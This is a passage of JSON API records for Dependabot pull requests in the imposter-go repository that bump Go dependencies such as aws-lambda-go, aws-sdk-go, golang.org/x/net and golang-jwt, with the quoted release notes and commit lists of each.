\u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.54.0...v1.53.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.54.0...v1.53.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.53.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd S3 event optional fields by \u003ca href=\"https://github.com/yhamano0312\"\u003e\u003ccode\u003e@​yhamano0312\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/612\"\u003eaws/aws-lambda-go#612\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate workflows for go 1.26 by \u003ca href=\"https://github.com/bmoffatt\"\u003e\u003ccode\u003e@​bmoffatt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/617\"\u003eaws/aws-lambda-go#617\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix spelling typos by \u003ca href=\"https://github.com/magnetikonline\"\u003e\u003ccode\u003e@​magnetikonline\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/616\"\u003eaws/aws-lambda-go#616\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for Cognito Inbound federation Lambda trigger by \u003ca href=\"https://github.com/maximrub\"\u003e\u003ccode\u003e@​maximrub\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/619\"\u003eaws/aws-lambda-go#619\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yhamano0312\"\u003e\u003ccode\u003e@​yhamano0312\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/612\"\u003eaws/aws-lambda-go#612\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magnetikonline\"\u003e\u003ccode\u003e@​magnetikonline\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/616\"\u003eaws/aws-lambda-go#616\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/maximrub\"\u003e\u003ccode\u003e@​maximrub\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/619\"\u003eaws/aws-lambda-go#619\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.53.0...v1.52.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.53.0...v1.52.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.52.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elambdacontext\u003c/code\u003e feature: Adding structured logging helper by \u003ca href=\"https://github.com/anzheyazzz\"\u003e\u003ccode\u003e@​anzheyazzz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/614\"\u003eaws/aws-lambda-go#614\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anzheyazzz\"\u003e\u003ccode\u003e@​anzheyazzz\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/614\"\u003eaws/aws-lambda-go#614\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.2...v1.52.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.2...v1.52.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: always return PhysicalResourceID for CFn CustomResources by \u003ca href=\"https://github.com/Youssef-Beltagy\"\u003e\u003ccode\u003e@​Youssef-Beltagy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/613\"\u003eaws/aws-lambda-go#613\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Youssef-Beltagy\"\u003e\u003ccode\u003e@​Youssef-Beltagy\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/613\"\u003eaws/aws-lambda-go#613\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.1...v1.51.2\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.1...v1.51.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003edocumentation rework by \u003ca href=\"https://github.com/bmoffatt\"\u003e\u003ccode\u003e@​bmoffatt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/608\"\u003eaws/aws-lambda-go#608\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.0...v1.51.1\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.0...v1.51.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/ca19f6ff85c6e7e87430d86d98d64a2d461dbabf\"\u003e\u003ccode\u003eca19f6f\u003c/code\u003e\u003c/a\u003e Allow ClientContext.Custom unmarshaling for non-string (JSON) values (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/620\"\u003e#620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/9c32960087517ddf57e3d405fae5e8e5e730f4cc\"\u003e\u003ccode\u003e9c32960\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/619\"\u003e#619\u003c/a\u003e from maximrub/inbound-federation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/ebe38d988fd6f254f2c818c1bd12e15df52577f3\"\u003e\u003ccode\u003eebe38d9\u003c/code\u003e\u003c/a\u003e add support for Cognito Inbound federation Lambda trigger\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/71624ac50ffdcb73bce436c791caadfb468a8abc\"\u003e\u003ccode\u003e71624ac\u003c/code\u003e\u003c/a\u003e Fix spelling typos (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/616\"\u003e#616\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/33e4dc3007f6898e4031ac3b04520a21c0a4fb8c\"\u003e\u003ccode\u003e33e4dc3\u003c/code\u003e\u003c/a\u003e Update workflows for go 1.26 (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/617\"\u003e#617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/e1cb4611fc8ef22a40196b19651a33487b846a01\"\u003e\u003ccode\u003ee1cb461\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/612\"\u003e#612\u003c/a\u003e from yhamano0312/feat/add-s3-event-fields\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/a66ce2dc84f235c83f927524f218a106aa3f0c93\"\u003e\u003ccode\u003ea66ce2d\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into feat/add-s3-event-fields\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/9dac8a59d3d97d63314ac5ffc7d12475eaa0a76a\"\u003e\u003ccode\u003e9dac8a5\u003c/code\u003e\u003c/a\u003e Add structured logging helper (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/614\"\u003e#614\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/6252f73f51494b482a1ff1b21b84bb764add35b2\"\u003e\u003ccode\u003e6252f73\u003c/code\u003e\u003c/a\u003e fix: always return PhysicalResourceID for CFn CustomResources (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/613\"\u003e#613\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/be52e48b133401d28c9f19b746989c4f1458b816\"\u003e\u003ccode\u003ebe52e48\u003c/code\u003e\u003c/a\u003e feat: add lifecycle event data structure and corresponding test for S3 events\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.49.0...v1.54.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.7 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `golang.org/x/net` from 0.42.0 to 0.50.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/ebddb99633e0fc35d135f62e9400678492c1d3be\"\u003e\u003ccode\u003eebddb99\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/4a490d4f5331699af2b0987af2e4cea9925f65af\"\u003e\u003ccode\u003e4a490d4\u003c/code\u003e\u003c/a\u003e internal/http3: add Expect: 100-continue support to ClientConn\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/73fe7011adb0a690693f0318325c60d477c7bb3a\"\u003e\u003ccode\u003e73fe701\u003c/code\u003e\u003c/a\u003e internal/http3: add Expect: 100-continue support to Server\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/af0c9df79dbe35108ead105e4ca28133551e4d1a\"\u003e\u003ccode\u003eaf0c9df\u003c/code\u003e\u003c/a\u003e html: add NodeType.String() method\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/e02fb33933734f5c17f8474ef9f54461e776d119\"\u003e\u003ccode\u003ee02fb33\u003c/code\u003e\u003c/a\u003e internal/http3: make responseWriter.Flush write headers if not done yet\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/da558ff100e05eb3fd3c94d2f978c062edc070a2\"\u003e\u003ccode\u003eda558ff\u003c/code\u003e\u003c/a\u003e internal/http3: ensure bodyReader cannot be read after being closed\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/d7c76faf077586c8657a8bdd404484c090764e2b\"\u003e\u003ccode\u003ed7c76fa\u003c/code\u003e\u003c/a\u003e internal/http3: make responseWriter behave closer to other http.ResponseWriter\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/64b3af9625ad94ce3f68ac1ab80733f691a49319\"\u003e\u003ccode\u003e64b3af9\u003c/code\u003e\u003c/a\u003e http2: prevent transport deadlock due to WINDOW_UPDATE that exceeds limit\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/1973e8da2d578cd964f4c1df41ed8c553f1e17b7\"\u003e\u003ccode\u003e1973e8d\u003c/code\u003e\u003c/a\u003e internal/http3: add Server support for handling HEAD requests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/57ea86db083ff804aa7dfca3489c0f965ab3b0da\"\u003e\u003ccode\u003e57ea86d\u003c/code\u003e\u003c/a\u003e icmp, internal/socket, ipv4, ipv6: use binary.NativeEndian\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/golang/net/compare/v0.42.0...v0.50.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e","html_url":"https://github.com/imposter-project/imposter-go/pull/58","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/imposter-project%2Fimposter-go/issues/58","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/58/packages"},{"uuid":"4206092544","node_id":"PR_kwDONfDiq87QAFpU","number":53,"state":"closed","title":"build(deps): bump the go-minor-and-patch group across 1 directory with 9 updates","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-05T19:19:42.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-05T00:31:33.000Z","updated_at":"2026-04-05T19:19:44.000Z","time_to_close":67689,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"go-minor-and-patch","update_count":9,"packages":[{"name":"github.com/brianvoe/gofakeit/v7","old_version":"7.14.0","new_version":"7.14.1","repository_url":"https://github.com/brianvoe/gofakeit"},{"name":"github.com/golang-jwt/jwt/v5","old_version":"5.3.0","new_version":"5.3.1","repository_url":"https://github.com/golang-jwt/jwt"},{"name":"github.com/hashicorp/go-plugin","old_version":"1.6.3","new_version":"1.7.0","repository_url":"https://github.com/hashicorp/go-plugin"},{"name":"github.com/pb33f/libopenapi","old_version":"0.22.3","new_version":"0.35.1","repository_url":"https://github.com/pb33f/libopenapi"},{"name":"github.com/pb33f/libopenapi-validator","old_version":"0.4.7","new_version":"0.13.3","repository_url":"https://github.com/pb33f/libopenapi-validator"},{"name":"github.com/aws/aws-lambda-go","old_version":"1.49.0","new_version":"1.54.0","repository_url":"https://github.com/aws/aws-lambda-go"},{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"}],"path":null,"ecosystem":"go"},"body":"Bumps the go-minor-and-patch group with 7 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/brianvoe/gofakeit/v7](https://github.com/brianvoe/gofakeit) | `7.14.0` | `7.14.1` |\n| [github.com/golang-jwt/jwt/v5](https://github.com/golang-jwt/jwt) | `5.3.0` | `5.3.1` |\n| [github.com/hashicorp/go-plugin](https://github.com/hashicorp/go-plugin) | `1.6.3` | `1.7.0` |\n| [github.com/pb33f/libopenapi](https://github.com/pb33f/libopenapi) | `0.22.3` | `0.35.1` |\n| [github.com/pb33f/libopenapi-validator](https://github.com/pb33f/libopenapi-validator) | `0.4.7` | `0.13.3` |\n| [github.com/aws/aws-lambda-go](https://github.com/aws/aws-lambda-go) | `1.49.0` | `1.54.0` |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.7` | `1.55.8` |\n\n\nUpdates `github.com/brianvoe/gofakeit/v7` from 7.14.0 to 7.14.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/brianvoe/gofakeit/commit/ee08eae8003a40768c47bacd76dfa5503a461752\"\u003e\u003ccode\u003eee08eae\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/brianvoe/gofakeit/issues/392\"\u003e#392\u003c/a\u003e from shubhamatkal/fix/password-guarantee-character-sets\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/brianvoe/gofakeit/commit/c38fe1a8fb22e850fbdbbe2a54d5954a60e13a65\"\u003e\u003ccode\u003ec38fe1a\u003c/code\u003e\u003c/a\u003e github - workflow less verbose\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/brianvoe/gofakeit/commit/22b91127ddcc896b66a389c2c00b73985091d11c\"\u003e\u003ccode\u003e22b9112\u003c/code\u003e\u003c/a\u003e datetime - yearly fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/brianvoe/gofakeit/commit/35520064411e85a403d4b41f22d3269604871e20\"\u003e\u003ccode\u003e3552006\u003c/code\u003e\u003c/a\u003e fix: guarantee at least one char per enabled set in Password()\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/brianvoe/gofakeit/compare/v7.14.0...v7.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/golang-jwt/jwt/v5` from 5.3.0 to 5.3.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/golang-jwt/jwt/releases\"\u003egithub.com/golang-jwt/jwt/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.3.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003e🔐 Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd spellcheck Github action to catch common spelling mistakes by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/458\"\u003egolang-jwt/jwt#458\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eWithNotBeforeRequired\u003c/code\u003e parser option and add test coverage by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/456\"\u003egolang-jwt/jwt#456\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate godoc example func to properly refer to \u003ccode\u003eNewWithClaims()\u003c/code\u003e by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/459\"\u003egolang-jwt/jwt#459\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate github workflows by \u003ca href=\"https://github.com/mfridman\"\u003e\u003ccode\u003e@​mfridman\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/462\"\u003egolang-jwt/jwt#462\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdditional test for CustomClaims that validates unmarshalling behaviour by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/457\"\u003egolang-jwt/jwt#457\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix early file close in jwt cli by \u003ca href=\"https://github.com/mfridman\"\u003e\u003ccode\u003e@​mfridman\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/472\"\u003egolang-jwt/jwt#472\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd TPM signature reference by \u003ca href=\"https://github.com/salrashid123\"\u003e\u003ccode\u003e@​salrashid123\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/473\"\u003egolang-jwt/jwt#473\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove misleading ParserOptions documentation in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/484\"\u003egolang-jwt/jwt#484\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSave signature to Token struct after successful signing by \u003ca href=\"https://github.com/EgorSheff\"\u003e\u003ccode\u003e@​EgorSheff\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/417\"\u003egolang-jwt/jwt#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSet token.Signature in \u003ccode\u003eParseUnverified\u003c/code\u003e by \u003ca href=\"https://github.com/slickwilli\"\u003e\u003ccode\u003e@​slickwilli\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/414\"\u003egolang-jwt/jwt#414\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e👒 Dependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump crate-ci/typos from 1.34.0 to 1.35.3 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/461\"\u003egolang-jwt/jwt#461\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.35.4 to 1.36.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/470\"\u003egolang-jwt/jwt#470\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump github/codeql-action from 3 to 4 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/478\"\u003egolang-jwt/jwt#478\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.36.2 to 1.39.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/480\"\u003egolang-jwt/jwt#480\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golangci/golangci-lint-action from 8 to 9 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/481\"\u003egolang-jwt/jwt#481\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/setup-go from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/469\"\u003egolang-jwt/jwt#469\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.39.0 to 1.40.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/488\"\u003egolang-jwt/jwt#488\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/checkout from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/487\"\u003egolang-jwt/jwt#487\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.40.0 to 1.41.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/490\"\u003egolang-jwt/jwt#490\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.41.0 to 1.42.1 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/492\"\u003egolang-jwt/jwt#492\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/458\"\u003egolang-jwt/jwt#458\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/salrashid123\"\u003e\u003ccode\u003e@​salrashid123\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/473\"\u003egolang-jwt/jwt#473\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/EgorSheff\"\u003e\u003ccode\u003e@​EgorSheff\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/417\"\u003egolang-jwt/jwt#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/slickwilli\"\u003e\u003ccode\u003e@​slickwilli\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/414\"\u003egolang-jwt/jwt#414\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca 